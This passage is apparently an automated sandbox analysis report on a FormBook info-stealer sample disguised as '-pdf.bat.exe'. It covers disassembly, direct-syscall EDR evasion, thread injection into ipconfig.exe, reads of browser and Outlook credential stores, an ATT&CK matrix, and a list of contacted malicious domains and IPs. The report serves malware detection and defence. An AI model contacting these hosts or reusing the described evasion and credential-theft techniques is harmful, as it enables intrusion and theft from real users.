        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326CF51B mov eax, dword ptr fs:[00000030h]2_2_326CF51B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326CF51B mov eax, dword ptr fs:[00000030h]2_2_326CF51B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326CF51B mov eax, dword ptr fs:[00000030h]2_2_326CF51B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326AC51D mov eax, dword ptr fs:[00000030h]2_2_326AC51D
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262B5E0 mov eax, dword ptr fs:[00000030h]2_2_3262B5E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262B5E0 mov eax, dword ptr fs:[00000030h]2_2_3262B5E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262B5E0 mov eax, dword ptr fs:[00000030h]2_2_3262B5E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262B5E0 mov eax, dword ptr fs:[00000030h]2_2_3262B5E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262B5E0 mov eax, dword ptr fs:[00000030h]2_2_3262B5E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262B5E0 mov eax, dword ptr fs:[00000030h]2_2_3262B5E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326515EF mov eax, dword ptr fs:[00000030h]2_2_326515EF
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326AC5FC mov eax, dword ptr fs:[00000030h]2_2_326AC5FC
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F5C7 mov eax, dword ptr fs:[00000030h]2_2_3261F5C7
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F5C7 mov eax, dword ptr fs:[00000030h]2_2_3261F5C7
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F5C7 mov eax, dword ptr fs:[00000030h]2_2_3261F5C7
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F5C7 mov eax, dword ptr fs:[00000030h]2_2_3261F5C7
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F5C7 mov eax, dword ptr fs:[00000030h]2_2_3261F5C7
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F5C7 mov eax, dword ptr fs:[00000030h]2_2_3261F5C7
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F5C7 mov eax, dword ptr fs:[00000030h]2_2_3261F5C7
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F5C7 mov eax, dword ptr fs:[00000030h]2_2_3261F5C7
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F5C7 mov eax, dword ptr fs:[00000030h]2_2_3261F5C7
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326565D0 mov eax, dword ptr fs:[00000030h]2_2_326565D0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326245B0 mov eax, dword ptr fs:[00000030h]2_2_326245B0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326245B0 mov eax, dword ptr fs:[00000030h]2_2_326245B0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326DF582 mov eax, dword ptr fs:[00000030h]2_2_326DF582
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32652594 mov eax, dword ptr fs:[00000030h]2_2_32652594
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326EBA66 mov eax, dword ptr fs:[00000030h]2_2_326EBA66
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326EBA66 mov eax, dword ptr fs:[00000030h]2_2_326EBA66
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326EBA66 mov eax, dword ptr fs:[00000030h]2_2_326EBA66
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326EBA66 mov eax, dword ptr fs:[00000030h]2_2_326EBA66
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264EA40 mov eax, dword ptr fs:[00000030h]2_2_3264EA40
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264EA40 mov eax, dword ptr fs:[00000030h]2_2_3264EA40
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261FA44 mov ecx, dword ptr fs:[00000030h]2_2_3261FA44
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326ADA40 mov eax, dword ptr fs:[00000030h]2_2_326ADA40
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326BAA40 mov eax, dword ptr fs:[00000030h]2_2_326BAA40
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326BAA40 mov eax, dword ptr fs:[00000030h]2_2_326BAA40
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264DA20 mov eax, dword ptr fs:[00000030h]2_2_3264DA20
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264DA20 mov eax, dword ptr fs:[00000030h]2_2_3264DA20
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264DA20 mov eax, dword ptr fs:[00000030h]2_2_3264DA20
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264DA20 mov eax, dword ptr fs:[00000030h]2_2_3264DA20
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264DA20 mov eax, dword ptr fs:[00000030h]2_2_3264DA20
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264DA20 mov edx, dword ptr fs:[00000030h]2_2_3264DA20
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32621A24 mov eax, dword ptr fs:[00000030h]2_2_32621A24
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32621A24 mov eax, dword ptr fs:[00000030h]2_2_32621A24
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32617A30 mov eax, dword ptr fs:[00000030h]2_2_32617A30
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32617A30 mov eax, dword ptr fs:[00000030h]2_2_32617A30
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32617A30 mov eax, dword ptr fs:[00000030h]2_2_32617A30

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Found direct / indirect Syscall (likely to bypass EDR)
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtOpenKeyEx: Direct from: 0x778D2ABCJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtQueryInformationProcess: Direct from: 0x778D2B46Jump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtResumeThread: Direct from: 0x778D2EDCJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtCreateUserProcess: Direct from: 0x778D363CJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtDelayExecution: Direct from: 0x778D2CFCJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtReadFile: Direct from: 0x778D29FCJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtQuerySystemInformation: Direct from: 0x778D2D1CJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtWriteVirtualMemory: Direct from: 0x778D2D5CJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtMapViewOfSection: Direct from: 0x778D2C3CJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtResumeThread: Direct from: 0x778D35CCJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtAllocateVirtualMemory: Direct from: 0x778D2B1CJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtSetInformationProcess: Direct from: 0x778D2B7CJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtNotifyChangeKey: Direct from: 0x778D3B4CJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtReadVirtualMemory: Direct from: 0x778D2DACJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtSetInformationThread: Direct from: 0x778C6319Jump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtQueryInformationToken: Direct from: 0x778D2BCCJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtAllocateVirtualMemory: Direct from: 0x778D3BBCJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtOpenFile: Direct from: 0x778D2CECJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtCreateFile: Direct from: 0x778D2F0CJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtQuerySystemInformation: Direct from: 0x778D47ECJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtQueryVolumeInformationFile: Direct from: 0x778D2E4CJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtDeviceIoControlFile: Direct from: 0x778D2A0CJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtAllocateVirtualMemory: Direct from: 0x778D2B0CJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtOpenSection: Direct from: 0x778D2D2CJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtSetInformationThread: Direct from: 0x778D2A6CJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtQueryAttributesFile: Direct from: 0x778D2D8CJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtClose: Direct from: 0x778D2A8C
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtCreateKey: Direct from: 0x778D2B8CJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtWriteVirtualMemory: Direct from: 0x778D482CJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtProtectVirtualMemory: Direct from: 0x778D2EBCJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeNtAllocateVirtualMemory: Direct from: 0x778D480CJump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: NULL target: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: NULL target: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: NULL target: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe protection: execute and read and writeJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: unknownJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeProcess created: C:\Users\user\Desktop\-pdf.bat.exe "C:\Users\user\Desktop\-pdf.bat.exe"Jump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: unknown unknownJump to behavior
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42754198083.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, ijDRAEBvXKu.exe, 00000003.00000000.38066538001.00000000016B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42754198083.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, ijDRAEBvXKu.exe, 00000003.00000000.38066538001.00000000016B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42754198083.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, ijDRAEBvXKu.exe, 00000003.00000000.38066538001.00000000016B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42754198083.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, ijDRAEBvXKu.exe, 00000003.00000000.38066538001.00000000016B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 0_2_00403804 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,LdrInitializeThunk,CharNextW,LdrInitializeThunk,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,0_2_00403804

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000002.00000002.38153009509.00000000322E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.42207281231.0000000003880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.42206068173.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.42753648495.0000000001020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.38153921691.0000000032940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.42754818639.0000000002C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\ipconfig.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000002.00000002.38153009509.00000000322E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.42207281231.0000000003880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.42206068173.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.42753648495.0000000001020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.38153921691.0000000032940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.42754818639.0000000002C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
        Native API        		1
        DLL Side-Loading        		1
        Access Token Manipulation        		1
        Masquerading        		1
        OS Credential Dumping        		121
        Security Software Discovery        		Remote Services1
        Email Collection        		11
        Encrypted Channel        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts212
        Process Injection        		2
        Virtualization/Sandbox Evasion        		LSASS Memory2
        Virtualization/Sandbox Evasion        		Remote Desktop Protocol1
        Archive Collected Data        		3
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Abuse Elevation Control Mechanism        		1
        Access Token Manipulation        		Security Account Manager2
        Process Discovery        		SMB/Windows Admin Shares1
        Data from Local System        		4
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        DLL Side-Loading        		212
        Process Injection        		NTDS1
        Application Window Discovery        		Distributed Component Object Model1
        Clipboard Data        		15
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information        		LSA Secrets1
        System Network Configuration Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Abuse Elevation Control Mechanism        		Cached Domain Credentials2
        File and Directory Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
        Obfuscated Files or Information        		DCSync14
        System Information Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1525408 Sample: -pdf.bat.exe Startdate: 04/10/2024 Architecture: WINDOWS Score: 100 32 www.ngmr.xyz 2->32 34 www.whats-in-the-box.org 2->34 36 27 other IPs or domains 2->36 42 Multi AV Scanner detection for domain / URL 2->42 44 Suricata IDS alerts for network traffic 2->44 46 Malicious sample detected (through community Yara rule) 2->46 50 4 other signatures 2->50 9 -pdf.bat.exe 2 20 2->9         started        signatures3 48 Performs DNS queries to domains with low reputation 32->48 process4 file5 24 C:\Users\user\AppData\Local\...\System.dll, PE32 9->24 dropped 60 Switches to a custom stack to bypass stack traces 9->60 13 -pdf.bat.exe 6 9->13         started        signatures6 process7 dnsIp8 38 fredy.ee 185.86.211.136, 443, 49727, 49728 TVHORADADAES Spain 13->38 62 Maps a DLL or memory area into another process 13->62 17 ijDRAEBvXKu.exe 13->17 injected signatures9 process10 dnsIp11 26 dxzz.top 137.175.33.56, 49780, 49781, 49782 PEGTECHINCUS United States 17->26 28 dfmagazine.shop 84.32.84.32, 49740, 49741, 49742 NTT-LT-ASLT Lithuania 17->28 30 9 other IPs or domains 17->30 40 Found direct / indirect Syscall (likely to bypass EDR) 17->40 21 ipconfig.exe 13 17->21         started        signatures12 process13 signatures14 52 Tries to steal Mail credentials (via file / registry access) 21->52 54 Tries to harvest and steal browser information (history, passwords, etc) 21->54 56 Modifies the context of a thread in another process (thread injection) 21->56 58 Maps a DLL or memory area into another process 21->58

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        -pdf.bat.exe24%ReversingLabsWin32.Trojan.InjectorX
        -pdf.bat.exe26%VirustotalBrowse
        -pdf.bat.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nsq66FB.tmp\System.dll0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        www.inastra.online0%VirustotalBrowse
        dxzz.top0%VirustotalBrowse
        whats-in-the-box.org2%VirustotalBrowse
        linkwave.cloud0%VirustotalBrowse
        dhkatp.vip0%VirustotalBrowse
        dfmagazine.shop0%VirustotalBrowse
        tukaari.shop0%VirustotalBrowse
        komart.shop0%VirustotalBrowse
        fredy.ee1%VirustotalBrowse
        greekhause.org0%VirustotalBrowse
        platinumkitchens.info9%VirustotalBrowse
        www.tukaari.shop0%VirustotalBrowse
        www.ngmr.xyz1%VirustotalBrowse
        www.linkwave.cloud0%VirustotalBrowse
        www.dxeg.lol2%VirustotalBrowse
        www.dhkatp.vip0%VirustotalBrowse
        www.dfmagazine.shop1%VirustotalBrowse
        www.invicta.world2%VirustotalBrowse
        tempatmudisini01.click12%VirustotalBrowse
        www.greekhause.org0%VirustotalBrowse
        typ67.top0%VirustotalBrowse
        www.typ67.top2%VirustotalBrowse
        www.platinumkitchens.info0%VirustotalBrowse
        www.whats-in-the-box.org1%VirustotalBrowse
        www.tempatmudisini01.click8%VirustotalBrowse
        www.komart.shop0%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
        https://reg.ru0%VirustotalBrowse
        https://duckduckgo.com/ac/?q=0%VirustotalBrowse
        https://www.reg.ru/whois/?check=&dname=www.albero-dveri.online&amp;reg_source=parking_auto0%VirustotalBrowse
        https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search0%VirustotalBrowse
        http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD0%VirustotalBrowse
        https://www.google.com/images/branding/product/ico/googleg_alldp.ico1%VirustotalBrowse
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%VirustotalBrowse
        https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%VirustotalBrowse
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%VirustotalBrowse

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        www.albero-dveri.online
        		194.58.112.174
        		truetrue
          		unknown
          www.inastra.online
          		208.91.197.27
          		truefalseunknown
          dxzz.top
          		137.175.33.56
          		truetrueunknown
          whats-in-the-box.org
          		3.33.130.190
          		truetrueunknown
          linkwave.cloud
          		3.33.130.190
          		truetrueunknown
          tukaari.shop
          		3.33.130.190
          		truetrueunknown
          dfmagazine.shop
          		84.32.84.32
          		truetrueunknown
          dhkatp.vip
          		3.33.130.190
          		truetrueunknown
          fredy.ee
          		185.86.211.136
          		truefalseunknown
          www.invicta.world
          		13.248.169.48
          		truetrueunknown
          tempatmudisini01.click
          		103.21.221.4
          		truetrueunknown
          komart.shop
          		133.130.35.90
          		truetrueunknown
          www.ngmr.xyz
          		54.67.87.110
          		truetrueunknown
          www.dorikis.online
          		162.213.249.216
          		truetrue
            		unknown
            greekhause.org
            		3.33.130.190
            		truetrueunknown
            platinumkitchens.info
            		3.33.130.190
            		truetrueunknown
            typ67.top
            		38.47.207.146
            		truetrueunknown
            www.tukaari.shop
            		unknown
            		unknowntrueunknown
            www.linkwave.cloud
            		unknown
            		unknowntrueunknown
            www.dfmagazine.shop
            		unknown
            		unknowntrueunknown
            www.dxeg.lol
            		unknown
            		unknowntrueunknown
            www.dhkatp.vip
            		unknown
            		unknowntrueunknown
            www.whats-in-the-box.org
            		unknown
            		unknowntrueunknown
            www.greekhause.org
            		unknown
            		unknowntrueunknown
            www.platinumkitchens.info
            		unknown
            		unknowntrueunknown
            www.komart.shop
            		unknown
            		unknowntrueunknown
            www.typ67.top
            		unknown
            		unknowntrueunknown
            www.tempatmudisini01.click
            		unknown
            		unknowntrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://www.invicta.world/tcs6/true
              		unknown
